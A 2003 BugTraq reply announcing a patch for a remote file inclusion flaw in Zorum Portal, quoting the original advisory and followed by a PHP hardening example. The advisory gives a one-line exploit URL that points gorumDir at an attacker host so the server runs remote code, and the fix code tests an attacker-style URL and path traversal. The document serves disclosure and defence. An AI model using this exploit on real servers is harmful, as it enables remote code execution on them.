BugTraq
Re: Zorum Portal (PHP) Jan 26 2003 07:03PM
Frog Man (leseulfrog hotmail com) (1 replies)
A patch has been created for this hole and can be found on
http://www.phpsecure.org/.

>From: MGhz <magas (at) mail (dot) lt [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Zorum Portal (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magas (at) mail (dot) lt [email concealed]
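
One way to close the hole described in the advisory above, as an added example (not Zorum's code and not the phpsecure.org patch): the include base directory is fixed by the script, and each library path is resolved with realpath() before it is included. The helper name `lib_path`, the temporary directory and the stub `group.php` are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example; not Zorum's code and not the phpsecure.org patch.
// Vulnerable pattern from the advisory: include.php never sets $gorumDir
// itself, so a request parameter can supply it:
//     include("$gorumDir/group.php");

// Hypothetical helper: map a library name to a real file under a fixed local directory.
function lib_path(string $baseDir, string $file): string
{
    // Library names are plain identifiers: no slashes, "..", or URL schemes.
    if (preg_match('/\A[A-Za-z0-9_]+\.php\z/', $file) !== 1) {
        throw new InvalidArgumentException('bad library name');
    }
    // realpath() only resolves local paths; it returns false for URLs
    // and for paths that do not exist.
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('library directory is not a local directory');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($path === false || dirname($path) !== $base) {
        throw new RuntimeException('library file not found under base directory');
    }
    return $path;
}

// Constructed demo: a temporary directory stands in for the forum's library directory.
$libDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gorum_demo_' . getmypid();
mkdir($libDir);
file_put_contents($libDir . DIRECTORY_SEPARATOR . 'group.php', "<?php return 'group loaded';\n");

// The base directory is fixed by the script, never read from request input.
$result = require lib_path($libDir, 'group.php');
echo $result, "\n";

// A request-supplied base like the one in the advisory is refused before any include runs.
foreach ([['http://attacker.example/', 'group.php'], [$libDir, '../group.php']] as [$dir, $file]) {
    try {
        lib_path($dir, $file);
        echo "accepted (unexpected)\n";
    } catch (Exception $e) {
        echo 'refused: ', $e->getMessage(), "\n";
    }
}

unlink($libDir . DIRECTORY_SEPARATOR . 'group.php');
rmdir($libDir);
```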
